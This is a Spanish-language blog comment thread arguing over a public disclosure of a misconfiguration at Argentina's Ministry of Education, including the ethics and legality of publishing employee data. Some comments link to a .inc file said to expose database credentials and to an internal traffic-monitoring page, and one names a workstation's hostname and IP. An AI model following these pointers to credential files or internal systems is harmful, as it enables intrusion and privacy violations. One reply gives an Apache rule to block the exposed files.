En Argentina hay gente con mas capacidad que en varios paises del "primer mundo" lamentablemente en todo lo publico nunca trabaja la gente idonea, sino "el amigo de" que "sabe de". Le juego a cualquiera una birra que los administradores del ME son muchos de los Read Only de varios foros sobre linux, y me imagino el sudor frio que les corrio cuando leyeron en los mails sobre tamaño agujero de seguridad.
Si alguien ve una puerta abierta de una oficina gubernamental, entra por curiosidad y luego alerta a las autoridades lo que esta ocurriendo no puede ser condenado bajo ninguna ley. Ahora, tomar datos de alli adentro y hacerlos publicos... deja un buen margen para la culpabilidad.

Saludos desde el interior.

 
A las 2:47 PM , Anonymous Anónimo ha dicho...

http://www.osi.com.ar/osi/osi.inc

a este flaco ya le avise y al parecer no le importa, la db esta disponible para cualquiera tambien.

La gente de towebs.com deja al descubierto las claves de acceso a mysql en el site de cada cliente.

Esta lleno de imbeciles en todas las esferas.

guarr<>

 
A las 3:24 PM , Anonymous Anónimo ha dicho...

Creo que no es manera de postear la vulnerabilidad que encontraste, en realidad no es ningún bug, el 100 % de los errores que informaste son por fallas en la configuración por un "descuido" o desconocimiento de el/los administradores.

Hay otras maneras de hacer publicas estas cosas, no te creas muy piola porque porque pones algunos de los datos que lograste recolectar.

Si realmente supieras lo que estas haciendo, solo hubieras informado del problema a las autoridades que le compete.. antes de publicar algo, dando tiempo a que el error pueda ser corregido. Y si no fuera así y no solucionaran el problema.. tampoco tenés derechos a postear los datos de los empleados.. o poner paso por paso como llegar a ellos... alcanza con hacer público el descubrimiento sin entrar en detalles que no aportan absolutamente nada.

Por otro lado, quería dejar en claro, para los que desconocen que el 90 % de los sistemas críticos en los organismos del estado corren bajo plataformas (unix) , linux, aix, solaris.

Saludos.

 
A las 3:35 PM , Anonymous Pablo FIUBA ha dicho...

Todos los que ponen un comentario pero no firman son mas cagones que este tipo. Cha

 
A las 3:43 PM , Anonymous javito ha dicho...

Me da paja firmar.

 
A las 4:09 PM , Anonymous Anónimo ha dicho...

Te fuiste de tema. Tendrias que haber llegado a las ultimas instancias para notificar. Te aseguro que si le mandabas un mail a las maximas autoridades del ministerio con sus direcciones y otros datos, seguro te daban bola.

Publicaste datos privados (como direccion y telefono) eso solo basta para que tengas flor de quilombo y aunque no lo tengas, no hay derecho para que lo hagas.
A vos te gustaria que cualquier "wannabe" publique tus datos en Internet?
Me parece que tu accion es contraria a la etica.
No sos ningún heroe, ni auditor ni nada, das pena.
Lo que hiciste demuestra que tenes no solo pocos conocimientos y etica, sino que poco cerebro.

 
A las 4:10 PM , Anonymous Anónimo ha dicho...

No te habrás jugado mucho con tus comentarios PABLO FIUBA ??? jajaj dejate de joder

 
A las 12:34 AM , Anonymous ale ha dicho...

todos opinan, "vas a ir preso" "sos un nabo" bla bla bla...jajaja está buenisimo. La informacion privada "es privada" si alguien desde internet puede acceder, entonces ya no es privada, es "publica"...so? en qe qedamos?

seba, nada va a pasar, aunqe miles de miedosos quieran, no va a pasar..

bien, (Y)

 
A las 3:56 PM , Anonymous Pablo FIUBA ha dicho...

Ahh mueranse todos.

 
A las 10:35 PM , Anonymous Anónimo ha dicho...

>>todos opinan, "vas a ir preso" "sos un nabo" bla bla bla...jajaja está buenisimo. La informacion privada "es privada" si alguien desde internet puede acceder, entonces ya no es privada, es "publica"...so? en qe qedamos?

si que sos un nabo...esos datos ERAN privados, no eran divulgados publicamente a priori, LO ENTENDES? hasta que alguien con 0 cerebro los divulgo etc..vos de verdad pensas que no puede pasar nada...segui pensandolo..preguntale a la gente que ha tenido que pagar por la ignorancia que ha tenido respecto a las leyes...vos debes de ser uno mas de esos obviamente

 
A las 11:04 PM , Anonymous Anónimo ha dicho...

Si dejo la puerta abierta de mi casa, te da derecho a entrar ???? Si te veo dentro llamaría a la policía !!!.

Y por vivir en Argentina también te pueden hacer juicio por esto !!!! Y si no me creés ya te tocarán a la puerta, jajajaj. Conozco a un flaco que entró en al menos un servidor y como dejó rastros lo agarraron. Y eso que hizo unos cuantos puentes. El pibe no hizo nada malo, solo accedió a todos los datos de los clientes de un provider de aquí (ARG). Se hizo el que sabía mucho pero todavía se está comiendo el juicio penal !!!!

Me da gracia de la gente que apoya esto y te considera un ídolo, jajaja. Que te paguen el abogado !!!

 
A las 11:05 AM , Anonymous Anónimo ha dicho...

Hola! bueno, no me tocaron la puerta, mejor aún! me dieron trabajo como administrador de los sites del gov.ar y de las dbs. En febrero me voy a con mi chica a Europa, todo pago por DigiAudit.gov.ar
-----------------------------------
que tanta charachara informatica y ética... enserio... que te paso seba? te tocaron la puerta? bueno, si te da paranoia andate de vacaciones a gesell con tu mina, mas de dos veces no te van a pasar a buscar.
saludos!

 
A las 10:16 PM , Anonymous iContradictor ha dicho...

Saludos,

Lo que hace Sebastián es Ingeniería Social. Si alguien cree que esto no se hace, pues por allá en el lejano 1996 se certificaba uno como Verisign Software Intruder. Y que sitios se elejian? Los que Uds. nunca pensarián. Claro, nadie revelaba nada. Pero esto pasaba. Y pasa. Que se publique esto aquí? No es malo. Es como publicar el código de un virus. Total. No hay ciencia mala ni buena, si no determinaciones de la Ciencia. Creo que lo mínimo que puede hacer el que configuró esto, es corregirlo y listo. Y los que tiene algo así, pues arreglarlo! En sintesis, sin que sea lo más ortodoxo, pues es algo. Peor no es corregir.

Exitos,

iC, Ph.D.

 
A las 9:58 AM , Anonymous Juan Pablo Lopez Bergero ha dicho...

Insisto como dije antes, hiciste bien.
Y respecto a los criticones, ya con que le digan una sola vez que va a ir preso es suficiente, yo si soy el autor de este articulo y me cae media comunidad diciendo que voy a ir preso tendría el culo en las manos.
Yo no creo que valla preso, y la verdad espero que no. Para los que la tienen "atada" con asuntos legales, o son "gente de bien" esos que dicen... huy, yo hubiera avisado a las autoridades... sisisi
traten de ayudar en asuntos legales.
Sebas, te comento que tengo un buen abogado para estas cosas... me imagino que estas viendo todos los comentarios... así que podes pedirme los datos a lopezjp@gmail.com

Por otro lado, para aquellos que hubieran "hecho las cosas bien" esos seguramente no habrían descubierto la falla :)

 
A las 12:18 PM , Anonymous Anónimo ha dicho...

Que tal gente? quiero decir que lo que aca Sebastian hizo, no es ninguna ciencia creo que cualquier alumno de primer año de la universidad que sepa algo de programacion lo podria haber hecho, la cuestion que en su afan de querer mostrar un falla de seguridad que para mi no es de los administradores directamente sino de del programador, que al poner solamente la extencion .inc (esto se entiende de que el servidor web lo va a leer como texto plano) y cuando en realidad deberia haber puesto inc.php para que sea interpretado por el webserver, lo que deberia haber hecho sebastian a mi criterio es publicar la falla de seguridad pero sin comprometerla y seguir intentando contactarse con los responsables del area informatica.
Yo creo que si los datos publicados hubisen sido de alguno de los que postearon en este blog no estarian muy de acuerdo en que se publicaran, asi que piensen un poco antes de decir cualquier pavada por que les puede tocar a cualquiera.

 
A las 6:00 PM , Anonymous Alvaro ha dicho...

Hola. Yo soy un usuario del servidor de correo del ministerio de educación. De hecho trabajo dentro del ministerio, soy informático, y estuve trabajando como administrador de los servidores de correo, web, dns, firewalls y demás (Linux) en una dependencia de la UBA. Considero que la experiencia, el conocimiento, etc. depende directamente del profesional, más que de la institución donde estudió (no estudié en la UBA, sino en una privada, aunque no me enorgullezca eso). Los empleados del estado (por las experiencias que tuve) relacionados con informática, u otras áreas técnicas, son estudiantes, técnicos, etc. que por lo gral. se toman el laburo con seriedad, le ponen(mos) onda. Los sueldos no son altos. Yo personalmente sigo en el estado por una cuestión ideológica, ya que cualquier profesional ambicioso buscaría saltar a una empresa a ganar los altos sueldos del mercado. Como en cualquier lugar hay gente que no está capacitada, gente que no le interesa el laburo, que va a cumplir horario y ya. No hablo por el/los responsables de este error, ya que no lo/s conozco, simplemente aclaro un par de cuestiones ya que los posts anteriores son muy diversos, algunos acusan, otros apoyan, y la mayoría son anónimos, tiran mierda sin ver la forma de criticar con conciencia. Yo, argentino, orgulloso y amante de mi tierra, veo que muchos otros hermanos de esta tierra hablan del gobierno o el estado como una entidad corrupta, como algo podrido y ajeno. Para mí no es así. El estado somos todos, el Gobierno son los empleados del estado que trabajan para que el país funcione. Queda en cada uno de todos los empleados hacer lo mejor posible para tener un mejor país; y queda en cada uno de los ciudadanos no ser destructivo. Es al pedo acusar sin hacerse cargo. Cuando uno dice "así está el país" me suena lo más facilista y lamentable del mundo.
Los empleados del estado no son todos corruptos. Hay que respetar el trabajo de todos. Yo estoy en contra de las empresas, pero por otra parte estoy bajo el rigor de manipulaciones políticas, que algunas veces se limitan a cuestiones caprichosas, de negocio, de poder, etc.
Seguramente la persona responsable se encontraba de vacaciones (que todo el mundo las merece) y cuando volvió habrá hecho los cambios pertinentes. Yo volví de las mías y me encontré con que tenía que ir a buscar mi "nueva clave de correo".
Entiendo que en el Ministerio de Educación, Ciencia y TECNOLOGÍA de la Nación (no de sanidad ¿?), debiera haber un alto nivel de seguridad de la información, de los servicios, etc. (el ministerio cuenta con el apoyo del ArCERT, que brinda capacitaciones constantes).
No acuso ni justifico/defiendo al responsable de esta grave falta. Lamentablemente me veo afectado como usuario, y como profesional estos errores me provocan también dolor de estómago.
Lo que creo que todos debieran ver es que el estado no funciona como una empresa, donde hay un dueño, un capo y empleados, en donde si algo falla el dueño le pone una patada en el culo al capo y al empleado. Aquí no hay dueño, hay jefes, coordinadores, directores y empleados. Los cargos jerárquicos cambian con la política, y los empleados y técnicos quedan. En mi corta experiencia pude ver que no hay cortes de cabeza por errores y eso. Los jefes tratan de ver que el laburo se haga lo mejor posible, y los empleados lo mismo. Se intenta armar equipos de trabajo y conseguir el mejor nivel de profesionales que se pueda con los sueldos que puede pagar el estado, y capacitar. Esto es lo más fuerte que veo, es uno de los puntos más importantes del soft libre: los técnicos se tienen que capacitar. Bueno, me extendí mucho, la verdad que me este tema me toca mucho, y si da para seguirla me encantaría, pero con este espíritu de crítica constructiva.
Saludos

 
A las 2:39 PM , Anonymous Anónimo ha dicho...

YOUR SECURITY TECHNIQUE WILL BE DEFEATED
YOUR TECHNIQUE IS NO GOOD
I KNOW SENDMAIL TECHNIQUE

 
A las 5:56 AM , Anonymous Tecnoesclerotico ha dicho...

Para emprezar: Mi respeto hacia ti.

y ahora una pregunta: ¿leí que esa informacion era "privada"? pero no entiendo... si esta en internet (y en Google) deja de ser privada. sea "por error" o "por intencion" es publica... O sea que por leer algo "publico" que "lo es por error del propietario y no por intencion" a vos te pueden hacer un juicio?... sin previamente poner un cartel que diga "esto es pubico por error asi que por favor no lo lea"

si intentan hacertelo... supongo que les ira muy mal.

y nuevamente amigo mio: MI RESPETO Y APLAUSO A TI.

 
A las 9:45 PM , Anonymous ojo x ojo ha dicho...

No se si debiera. Pero, nobleza obliga.
Le gente que administra sistemas en ME, no solo peca por su vagancia, si no ademas, por su ignorancia.
Esos sistemas ya fueron auditados varias veces. Se expusieron todos los problemas que presentaban. Se explico porque no se debe confiar ningun "box" en internet sin un firewall de por medio. Pero no hicieron caso.
Eso lo atribuyo a la ignorancia.
Atribuyo vagancia al hecho de que les parezca buena idea redireccionar errores de kernel y descartar e ignorar logs por doquier, en vez de intentar interpretarlos.
El personal que trabaja -o por lo menos lo hacia hasta enero- constaba de empleados part-time que ganan 1500 y 3500 pesos por 4 horas diarias apenas cumplidas y en las que ademas, se dedican a comer y comentar sus desventuras privadas.
Que pase esto y no te den bola, cuando los estas previniendo o haciendoles un favor, no me sorprende. Lamentablemente por eso se atribuye a los empleados estatales la denominacion de noquis.

 
A las 3:40 PM , Anonymous ojo x ojo ha dicho...

Agrego datos, para que justificar mis comentarios con algo concreto. Les adjunto un chart con valores actuales (domingo, 3:30hs) y un link a una aplicacion de monitoreo de trafico del ME, que deberia estar "segura". La aplicacion se llama cflow y mide el trafico entrante y saliente.
lo que adjunto, demuestra que maquinas laborales, son utilizadas para asuntos personales, como la bajada de musica, peliculas y quizas pornografia.
Top 10 by pkts in
for five minute flow sample ending Sun Apr 2 15:28:26 2006 rank in Address bits/sec in bits/sec out pkts/sec in pkts/sec out flows/sec in flows/sec out
#1 swa101.crytic.mcye.gov.ar
168.83.84.101 118.6 k (59.9%) 0.0 (0.0%) 64.4 (41.1%) 0.0 (0.0%) 3.3 m (0.0%) 0.0 (0.0%)
Corriendo ciertos comandos, se puede llegar a saber a nombre de quien esta esa PC, de hecho yo ya lo se.
Para eso se utilizan nuestros impuestos. Para pagar a gente que hace uso y abuso y ni siquiera cumple con su trabajo como corresponde.

 
A las 3:50 PM , Anonymous ojo x ojo ha dicho...

El link en el que pueden ver eso es este:
http://168.83.80.16/graphs/topten.html
revisenlo y sabran en que anda nuestra gente amiga.
Lamentablemente el ArCert es un area responsable, pero que no puede controlar absolutamente a todo el estado. Y si no hay gente idonea ellos no pueden mas que proponer o sugerir.
Quizas el ME tuvo aviso y lo ignoro una vez mas...

 
A las 9:53 AM , Anonymous Anónimo ha dicho...

El supuesto "zorro" que ocasiono esto, es justamente un integrante del equipo de sistemas del ME. El tipo quiere formar su propia "area" dentro del departamento de sistemas y no tuvo mejor idea que cagar a su propio jefe, para justificar el puesto que esta inventando. Aun mas cuando existe un organismo como el ArCert, este tipo lo unico que quiere es una tajada mas grande de la torta que se reparte a costas del pueblo argentino. Es el companero ideal, no?

 
A las 12:11 AM , Anonymous Santiago ha dicho...

Hubiera sido una buena practica que comentes como solucionar el problema y no como abusar del mismo, porque a la hora de agrandarse, hay que saber medir las consecuencias, no era necesario comentar tanto del tema, solamente deberías de informar a la persona competente del bug encontrado. Y ahorrarte los méritos para vos.

 
A las 12:36 PM , Blogger OSiRiS ha dicho...

bueno a ver... despues de bastante tiempo de comenzar con php+mysql descubri muchisimas fallas en los códigos que había desarrollado, producto de la inexperiencia, falta de información de mi parte y los ISP donde hosteaba la web. Hoy se mucho más que ayer y menos que mañana y en cuanto a la falla del osi.inc hace tiempo que sabía que estaba mal y no tenía tiempo de corregirlo ni sabía como, pero no representaba una falla grave para mi, ya que la información que hay en el mysql no es de relevancia, a lo sumo algún vivo borraria o cambiaria algunos datos pero nada que no se pudiera restablecer con un backup.

No tengo registro de que alguien me envie un mail diciendome "negro corregi el .inc de esta manera para que no te entren".

Todos sabemos que el 98% de las fallas son humanas, la mayoría por falta de conocimientos adecuados, me parece que una buena actitud al descubrir una falla es avisar al (i)responsable, en mi caso no me di por enterado, de todos modos la web www.osi.com.ar no es de una empresa, simplemente son fotos y tengo alguna que otra web de algún amigo, es decir que la (in)seguridad no es primordial. Pero Si hay que saber cuáles son los errores que no hay que cometer para tener un mínimo de seguridad para encarar proyectos que si lo necesiten.

Sería más productivo hacer un tutorial paso a paso para tontos (como yo :-D) que expliquen que no hay que hacer, por ejemplo en el caso de los .inc una solución es configurar Apache para que los excluya mediante una expresión regular en el httpd.conf

FilesMatch ^\.inc
Order allow,deny
Deny from all
/FilesMatch


bueno espero que esto le ayude a alguien!! y no pienso entrar en discusiones y puteadas al parecer los blogs casi solo sirven para eso... jajaja

OSiRiS
osi@osi.com.ar

 

Publicar un comentario en la entrada

Enlaces a esta entrada:

Crear un enlace

<< Página principal